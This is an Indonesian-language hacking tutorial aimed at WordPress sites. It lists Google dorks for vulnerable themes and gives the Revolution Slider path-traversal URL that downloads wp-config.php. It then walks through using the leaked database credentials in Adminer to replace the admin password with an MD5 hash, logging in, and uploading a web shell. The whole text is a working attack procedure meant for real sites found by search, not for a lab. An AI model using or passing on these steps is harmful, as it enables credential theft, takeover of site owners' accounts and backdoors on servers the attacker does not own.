inurl:/wp-content/themes/theretailer
inurl:/wp-content/themes/incrediblewp
inurl:/wp-content/themes/revslider
inurl:/wp-content/themes/meteor-extras
3.exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
4.AdminLogin: /wp-admin/
5.MD5encrypt: http://md5encryption.com/
#notepad++ / notepad biasa juga gakpapa (kalo gak pusing :v)
KETERANGAN :
kalo DB_host nya 'LocalHost' berarti susah /gak bisa masuk pakai adminer. (not vuln)
tapi kalo vuln / bisa masuk ke adminer , itu DB_HOSTnya biasa nya panjang seperti ini :
DB_HOST', 'zuffahome.db.9391735.hostedresource.com'); ( VULN )
SETERUSNYA
1.copy dork ke google cari target
2.lalu beri exploit ,contoh : http://localhost.com/
menjadi: http://localhost.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
nanti otomatis mendownload wp-config nya lalu SAVE ..
3.buka file yang tadi di download dengan notepad++
4.disitu terdapat db_name , db-user , db_password, db_host .. (lihat gambar)
5.lalu siapkan adminer , dan masukan data terserbut , tanpa tanda ' (karena disitu tandanya 'user')
6.Lalu login.
7.Setelah login , cari USER, disitu terdapat tulisan SELECT USER , pilih SELECT
8.Lalu setelah muncul daftar admin / user nya .. pada nomer 1 user nya kamu klik edit
9.Ubah username dan passwordnya .. password yang anda ubah harus di hash md5 dulu .. pakai md5encript lalu save
10. Masuk ke halaman login admin nya.. dan masukan user n password yg kamu ubah tadi :v
11.Setelah masuk , tinggal upload shellnya. taraaaaaa....... Mudah bukan?.....
Thank Semoga Bermanfaat.
